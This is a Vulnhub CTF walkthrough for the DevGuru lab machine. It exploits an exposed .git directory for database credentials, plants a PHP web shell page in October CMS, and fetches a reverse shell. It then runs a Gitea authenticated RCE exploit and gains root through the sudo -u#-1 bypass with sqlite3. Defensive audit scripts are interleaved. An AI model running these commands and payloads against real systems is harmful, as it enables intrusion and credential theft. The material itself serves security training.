Devguru
Exploitation Guide for Devguru | Vulnhub
In this walkthrough, we will get the initial shell by exploiting an exposed .git directory to obtain the database credentials. Then we will log in to the web application's CMS, which has a code execution vulnerability. To escalate our privileges to another user we will get the credentials for the Gitea database from a backup file. We will use those credentials to change the user's password and log in to the web application, which has an authenticated RCE. Finally we will gain root privileges by exploiting a sudo vulnerability and a sudo misconfiguration.
## Nmap full TCP scan
nmap -p- -vv -Pn -oN nmapFullTCP.txt 192.168.79.130
Nmap scan report for 192.168.79.130
Host is up, received user-set (0.0015s latency).
Scanned at 2021-08-31 21:44:27 EDT for 2s
Not shown: 65532 closed ports
Reason: 65532 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8585/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Aug 31 21:44:29 2021 -- 1 IP address (1 host up) scanned in 2.37 seconds
## Nmap version enumeration with default scripts
nmap -sVCS -O -oN nmapVersion.txt -p22,80,8585 192.168.79.130
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
| 192.168.79.130:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open unknown
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=6a1b7184bb6ff2dc; Path=/; HttpOnly
| Set-Cookie: _csrf=P0Mgfs31k9b4oM_mEs0kULhN9Lg6MTYzMDQ2MDcyNjQxNzUyMzAzMA; Path=/; Expires=Thu, 02 Sep 2021 01:45:26 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Wed, 01 Sep 2021 01:45:26 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_ <meta name="description" content="Gitea (Git with a c
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ dirsearch -u $ip /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
[22:16:36] Starting:
[22:16:38] 301 - 315B - /.git -> http://192.168.79.130/.git/
[22:16:38] 200 - 13B - /.git/COMMIT_EDITMSG
[22:16:38] 200 - 73B - /.git/description
[22:16:38] 200 - 276B - /.git/config
[22:16:38] 200 - 23B - /.git/HEAD
[22:16:38] 200 - 240B - /.git/info/exclude
[22:16:38] 200 - 308KB - /.git/index
[22:16:38] 301 - 331B - /.git/logs/refs/heads -> http://192.168.79.130/.git/logs/refs/heads/
[22:16:38] 200 - 158B - /.git/logs/HEAD
[22:16:38] 200 - 158B - /.git/logs/refs/heads/master
[22:16:38] 301 - 325B - /.git/logs/refs -> http://192.168.79.130/.git/logs/refs/
[22:16:38] 301 - 340B - /.git/logs/refs/remotes/origin -> http://192.168.79.130/.git/logs/refs/remotes/origin/
[22:16:38] 301 - 333B - /.git/logs/refs/remotes -> http://192.168.79.130/.git/logs/refs/remotes/
[22:16:38] 200 - 41B - /.git/refs/heads/master
[22:16:38] 301 - 328B - /.git/refs/remotes -> http://192.168.79.130/.git/refs/remotes/
[22:16:38] 301 - 335B - /.git/refs/remotes/origin -> http://192.168.79.130/.git/refs/remotes/origin/
[22:16:38] 200 - 41B - /.git/refs/remotes/origin/master
[22:16:38] 301 - 325B - /.git/refs/tags -> http://192.168.79.130/.git/refs/tags/
[22:16:38] 301 - 326B - /.git/refs/heads -> http://192.168.79.130/.git/refs/heads/
[22:16:38] 200 - 142B - /.git/logs/refs/remotes/origin/master
[22:16:39] 200 - 413B - /.gitignore
[22:16:39] 200 - 2KB - /.htaccess
[22:16:45] 200 - 12KB - /0
[22:16:47] 200 - 18KB - /About
[22:16:50] 200 - 1KB - /README.md
[22:16:56] 200 - 18KB - /about
[22:17:04] 200 - 4KB - /adminer.php
[22:17:11] 302 - 414B - /backend/ -> http://192.168.79.130/backend/backend/auth
[22:17:17] 301 - 317B - /config -> http://192.168.79.130/config/
[22:17:35] 200 - 12KB - /index.php
[22:17:44] 301 - 318B - /modules -> http://192.168.79.130/modules/
[22:17:54] 301 - 318B - /plugins -> http://192.168.79.130/plugins/
[22:18:02] 200 - 10KB - /services
[22:18:02] 200 - 10KB - /services/
[22:18:06] 301 - 318B - /storage -> http://192.168.79.130/storage/
[22:18:10] 301 - 317B - /themes -> http://192.168.79.130/themes/
.git is found, so we may be able to download all of its contents. We also found the database login portal (adminer.php), the login page for the CMS, and its version.
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ dirsearch -u $ip:8585 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50 -o ~/Desktop/devguru/scans/dirsearch8585.txt
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
Output File: /home/kali/Desktop/devguru/scans/dirsearch8585.txt
Error Log: /home/kali/.dirsearch/logs/errors-21-08-31_22-31-30.log
Target: http://192.168.79.130:8585/
[22:31:30] Starting:
[22:31:36] 302 - 34B - /admin -> /user/login
[22:31:36] 302 - 34B - /admin/?/login -> /user/login
[22:31:36] 302 - 34B - /admin/ -> /user/login
[22:31:38] 200 - 575B - /api/swagger
[22:31:40] 302 - 27B - /css -> /css
[22:31:40] 200 - 160B - /debug
[22:31:40] 200 - 160B - /debug/
[22:31:41] 302 - 37B - /explore -> /explore/repos
[22:31:41] 200 - 10KB - /explore/repos
[22:31:42] 302 - 29B - /fonts -> /fonts
[22:31:42] 302 - 27B - /img -> /img
[22:31:43] 302 - 34B - /issues -> /user/login
[22:31:43] 302 - 26B - /js -> /js
[22:31:44] 200 - 670B - /manifest.json
[22:31:50] 200 - 9KB - /user/login/
Task Completed
Since we have access to .git, we can download all the files to our local PC and look for juicy stuff. First dump the files using gitdumper:
┌──(imtodess㉿deathnote)-[~/tools/GitTools/Dumper]
└─$ ./gitdumper.sh http://devguru.local/.git/ website/
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
Then use the extractor to get the files:
┌──(imtodess㉿deathnote)-[~/tools/GitTools/Extractor]
└─$ ./extractor.sh ~/Desktop/devguru/loot/website ~/Desktop/devguru/loot/ExtractedWeb
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
Let's look at the contents we got from it.
┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ ls
app.php cache.php database.php mail.php session.php
auth.php cms.php environment.php queue.php view.php
broadcasting.php cookie.php filesystems.php services.php
Look at database.php:
'mysql' => [
'driver' => 'mysql',
'engine' => 'InnoDB',
'host' => 'localhost',
'port' => 3306,
'database' => 'octoberdb',
'username' => 'october',
'password' => 'SQ66EBYx4GT3byXH',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'varcharmax' => 191,
],
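A defender-side audit of the two conditions this foothold depends on, added here as example code (not part of the original walkthrough or of the October CMS project): it walks a deployed document root, flags any .git directory the web server would serve, and flags PHP config files holding a literal secret such as the 'password' entry above. The webroot layout and file contents are constructed for the example.

```python
import os
import re
import tempfile

# Laravel/October-style config entries such as 'password' => 'SQ66EBYx4GT3byXH'.
# Only a quoted literal after '=>' is a finding; env('DB_PASSWORD') does not match.
CRED_RE = re.compile(r"""['"](password|secret)['"]\s*=>\s*['"]([^'"]+)['"]""", re.I)

def audit_webroot(webroot):
    """Walk a deployed document root and return sorted (kind, path, detail) findings:
    'vcs-metadata' for a .git directory (Apache serves it like any other path unless
    it is denied, which is what nmap's http-git script found) and
    'plaintext-credential' for a PHP config file carrying a literal secret."""
    findings = []
    for root, dirs, files in os.walk(webroot):
        rel = os.path.relpath(root, webroot)
        if ".git" in dirs:
            head = os.path.join(root, ".git", "HEAD")
            detail = "HEAD present" if os.path.exists(head) else "no HEAD"
            findings.append(("vcs-metadata", os.path.normpath(os.path.join(rel, ".git")), detail))
            dirs.remove(".git")            # do not descend into the repository objects
        for name in files:
            if not name.endswith(".php"):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
                for m in CRED_RE.finditer(fh.read()):
                    findings.append(("plaintext-credential",
                                     os.path.normpath(os.path.join(rel, name)), m.group(1)))
    return sorted(findings)

# Constructed sample config mirroring the shape of the leaked database.php.
SAMPLE_DATABASE_PHP = """<?php
return ['connections' => ['mysql' => [
    'host' => 'localhost',
    'database' => 'octoberdb',
    'username' => 'october',
    'password' => 'CONSTRUCTED-EXAMPLE-SECRET',
]]];
"""

def demo():
    # Constructed webroot: an exposed .git next to a config holding a literal secret.
    with tempfile.TemporaryDirectory() as webroot:
        os.makedirs(os.path.join(webroot, ".git"))
        with open(os.path.join(webroot, ".git", "HEAD"), "w") as fh:
            fh.write("ref: refs/heads/master\n")
        os.makedirs(os.path.join(webroot, "config"))
        with open(os.path.join(webroot, "config", "database.php"), "w") as fh:
            fh.write(SAMPLE_DATABASE_PHP)
        return audit_webroot(webroot)
```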
Log in to the database through adminer.php. Found user:
It seems we can edit the data. Change the password: generate a new bcrypt hash and replace the previous hash with the new one. Then log in to the CMS portal. Under the CMS tab, it seems we can execute code. Add a new page and add the code as shown.
# code
function onStart(){
$this->page["myVar"] = shell_exec($_GET['cmd']);
}
# markup
{{ this.page.myVar }}
Reference : https://octobercms.com/forum/post/running-php-code-on-pages
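The page above uses a standard October CMS feature, so the defensive check is to review theme files for PHP sections that call shell functions on request input. The scanner below is added example code, not part of the walkthrough or of October CMS; it assumes the theme file format (INI config, optional PHP, Twig markup, split by `==` lines) and constructs two sample pages, one of them the code shown above.

```python
import os
import re
import tempfile

DANGEROUS_RE = re.compile(r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(")  # shell/interpreter sinks
UNTRUSTED_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")  # request input in the same PHP section

def scan_page_source(text):
    """Return [(function, uses_request_input)] hits from one theme file's PHP section.
    Assumed October format: INI config, optional PHP, Twig markup, split by '==' lines."""
    sections = [s.strip() for s in re.split(r"^==[ \t]*$", text, flags=re.M)]
    if len(sections) < 3:
        return []                          # config + markup only: nothing is executed
    php = sections[1]
    tainted = UNTRUSTED_RE.search(php) is not None
    return [(m.group(1), tainted) for m in DANGEROUS_RE.finditer(php)]

def scan_theme(theme_dir):
    """Map each offending .htm file (path relative to the theme) to its hits."""
    hits = {}
    for root, _, files in os.walk(theme_dir):
        for name in sorted(files):
            if name.endswith(".htm"):
                path = os.path.join(root, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_page_source(fh.read())
                if found:
                    hits[os.path.relpath(path, theme_dir)] = found
    return hits

# Constructed theme files: the page injected in this walkthrough and a clean one.
BACKDOOR_PAGE = """title = "Backdoor"
==
<?php
function onStart(){
    $this->page["myVar"] = shell_exec($_GET['cmd']);
}
?>
==
{{ this.page.myVar }}
"""
CLEAN_PAGE = 'title = "About"\n==\n<h1>About</h1>\n'

def demo():
    with tempfile.TemporaryDirectory() as theme:
        os.makedirs(os.path.join(theme, "pages"))
        for name, body in (("backdoor.htm", BACKDOOR_PAGE), ("about.htm", CLEAN_PAGE)):
            with open(os.path.join(theme, "pages", name), "w") as fh:
                fh.write(body)
        return scan_theme(theme)
```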
Now we have code injection. We will upload a malicious PHP reverse shell and execute it to get our initial shell:
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Start http.server in the directory with the exploit.
┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ ls
shell.php
┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Download the shell on the target machine, then check that it was downloaded successfully. Start a Netcat listener:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
Execute the shell script. We now have initial access to the target machine:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
connect to [192.168.79.129] from (UNKNOWN) [192.168.79.130] 46030
Linux devguru.local 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:36:27 up 2:12, 0 users, load average: 0.04, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
There is a backup file. From there we will get another set of credentials, this time for the gitea database.
www-data@devguru:/var$ cd backups/
www-data@devguru:/var/backups$ ls
app.ini.bak apt.extended_states.0 apt.extended_states.1.gz
www-data@devguru:/var/backups$ cat app.ini.bak
. . .
; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
. . .
Log in to the database through adminer.php and do the same thing we did earlier: change the password of the user.
Note: We need to change hash_algo to bcrypt.
Now log in to gitea on port 8585. Look for known exploits:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ searchsploit gitea 1.12
------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------ ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authentic | multiple/webapps/49571.py
------------------------------------------------ ---------------------------------
Shellcodes: No Results
There is one authenticated RCE. Since we already have the credentials, let's use this exploit. Copy the exploit to your working directory.
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ cd ../exploit
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ searchsploit -m multiple/webapps/49571.py
Exploit: Gitea 1.12.5 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49571
Path: /usr/share/exploitdb/exploits/multiple/webapps/49571.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/Desktop/devguru/exploit/49571.py
Start a netcat listener.
┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
Execute the exploit:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ python3 49571.py -v -t http://192.168.79.130:8585 -u frank -p imtodess -I 192.168.79.129 -P 8585
_____ _ _______
/ ____(_)__ __| CVE-2020-14144
| | __ _ | | ___ __ _
| | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution
| |__| | | | | __/ (_| |
\_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5
[+] Starting exploit ...
[>] login('frank', ...)
[>] Deleting repository : vuln
[>] Creating repository : vuln
[>] repo_set_githook_post_receive('vuln')
[>] logout()
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
Initialized empty Git repository in /tmp/tmp.XLsXCQ6oLY/.git/
[master (root-commit) abec032] Initial commit
1 file changed, 1 insertion(+)
create mode 100644 README.md
Enumerating objects: 3, done.
Counting objects: 100% (3/3), done.
Writing objects: 100% (3/3), 249 bytes | 249.00 KiB/s, done.
[>] Deleting repository : vuln
[+] Exploit completed !
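The exploit works because an authenticated user can install a post-receive hook that Gitea then runs on the server. The audit below is added example code (not from the exploit or from the Gitea project): it lists custom hook scripts under a gitea-repositories tree and checks whether app.ini disables git hooks with DISABLE_GIT_HOOKS in [security]. The on-disk hook layout (hooks/<type>.d/, with Gitea's own entry named gitea) is an assumption about Gitea's structure, and the repository tree and app.ini are constructed.

```python
import os
import tempfile

HOOK_TYPES = ("pre-receive", "update", "post-receive")

def custom_hooks(repo_root):
    """Return sorted (owner/repo, hook_type, script, first_line) for every script in a
    hooks/<type>.d/ directory other than Gitea's own 'gitea' wrapper (assumed layout)."""
    found = []
    for dirpath, _, files in os.walk(repo_root):
        hook_dir = os.path.basename(dirpath)
        if not hook_dir.endswith(".d") or hook_dir[:-2] not in HOOK_TYPES:
            continue
        repo = os.path.relpath(os.path.dirname(os.path.dirname(dirpath)), repo_root)
        for script in sorted(files):
            if script == "gitea":
                continue                   # built-in entry that calls 'gitea hook'
            with open(os.path.join(dirpath, script), errors="replace") as fh:
                first_line = fh.readline().rstrip()
            found.append((repo, hook_dir[:-2], script, first_line))
    return sorted(found)

def git_hooks_disabled(app_ini_text):
    """True if [security] sets DISABLE_GIT_HOOKS = true. app.ini has keys before
    its first section header, so configparser would reject it; parse by hand."""
    section = None
    for raw in app_ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "security" and "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            if key.upper() == "DISABLE_GIT_HOOKS":
                return value.lower() == "true"
    return False

# Constructed app.ini: like the leaked app.ini.bak it never sets DISABLE_GIT_HOOKS.
SAMPLE_APP_INI = "APP_NAME = Gitea\n[database]\nDB_TYPE = mysql\nNAME = gitea\n[security]\nINSTALL_LOCK = true\n"

def demo():
    # Constructed repository tree shaped like the one the exploit leaves behind.
    with tempfile.TemporaryDirectory() as root:
        hook_dir = os.path.join(root, "frank", "vuln.git", "hooks", "post-receive.d")
        os.makedirs(hook_dir)
        with open(os.path.join(hook_dir, "gitea"), "w") as fh:
            fh.write("#!/usr/bin/env bash\n")
        with open(os.path.join(hook_dir, "post-receive"), "w") as fh:
            fh.write("#!/bin/sh\n# constructed stand-in for an attacker-planted hook\n")
        return custom_hooks(root)
```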
We now have access to the machine as user frank:
┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
connect to [192.168.79.129] from (UNKNOWN) [192.168.79.130] 44816
bash: cannot set terminal process group (658): Inappropriate ioctl for device
bash: no job control in this shell
frank@devguru:~/gitea-repositories/frank/vuln.git$ cd
frank@devguru:~$ ls
ls
gitea-repositories
Check for sudo privileges:
frank@devguru:~$ sudo -l
sudo -l
Matching Defaults entries for frank on devguru:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User frank may run the following commands on devguru:
(ALL, !root) NOPASSWD: /usr/bin/sqlite3
Check the sudo version:
frank@devguru:~$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
This version of sudo is vulnerable to a security bypass (reference: https://www.exploit-db.com/exploits/47502). Any user can execute /bin/bash with sudo -u#-1 /bin/bash. We will use this security bypass vulnerability along with our sudo privilege to escalate our privileges to root.
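A check for the two conditions combined here, added as example code rather than anything from the original walkthrough: it parses sudo -l and sudo --version output, flags a rule whose runas list is ALL with an exclusion on a sudo older than 1.8.28 (the release that fixed the -u#-1 bypass from exploit-db 47502), and flags commands such as sqlite3 whose interactive features spawn a shell. The sample output is constructed from what is shown above.

```python
import os
import re

# One rule line of `sudo -l` output: (runas list) [TAG: ...] command
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")
# Binaries whose interactive features spawn a shell; sqlite3's .shell is the one used on this box.
SHELL_ESCAPE_BINARIES = {"sqlite3"}   # extend from GTFOBins for a full audit
RUNAS_BYPASS_FIXED_IN = "1.8.28"      # -u#-1 bypass (exploit-db 47502) fixed from this release

def version_tuple(text):
    """'1.8.21p2' -> (1, 8, 21, 2); a missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups())

def audit_sudo(sudo_l_output, sudo_version_output):
    """Return (issue, command) findings from `sudo -l` and `sudo --version` text."""
    version = re.search(r"Sudo version (\S+)", sudo_version_output).group(1)
    bypassable = version_tuple(version) < version_tuple(RUNAS_BYPASS_FIXED_IN)
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [r.strip() for r in m.group("runas").split(",")]
        cmd = m.group("cmd").strip()
        # "(ALL, !root)" relies on the exclusion; on affected versions -u#-1 still yields uid 0
        if "ALL" in runas and any(r.startswith("!") for r in runas) and bypassable:
            findings.append(("runas-exclusion-bypass", cmd))
        if os.path.basename(cmd.split()[0]) in SHELL_ESCAPE_BINARIES:
            findings.append(("shell-escape", cmd))
    return findings

# Constructed from the output shown above for frank on devguru.
SAMPLE_SUDO_L = r"""Matching Defaults entries for frank on devguru:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User frank may run the following commands on devguru:
    (ALL, !root) NOPASSWD: /usr/bin/sqlite3
"""
SAMPLE_SUDO_VERSION = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
```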
frank@devguru:~$ sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
root@devguru:~# cd /root
root@devguru:/root# ls
msg.txt root.txt
root@devguru:/root# cat root.txt
96440606fb88aa7497cde5a8e68daf8f
root@devguru:/root# cat msg.txt
Congrats on rooting DevGuru!
Contact me via Twitter @zayotic to give feedback!
root@devguru:/root# cat /home/frank/user.txt
22854d0aec6ba776f9d35bf7b0e00217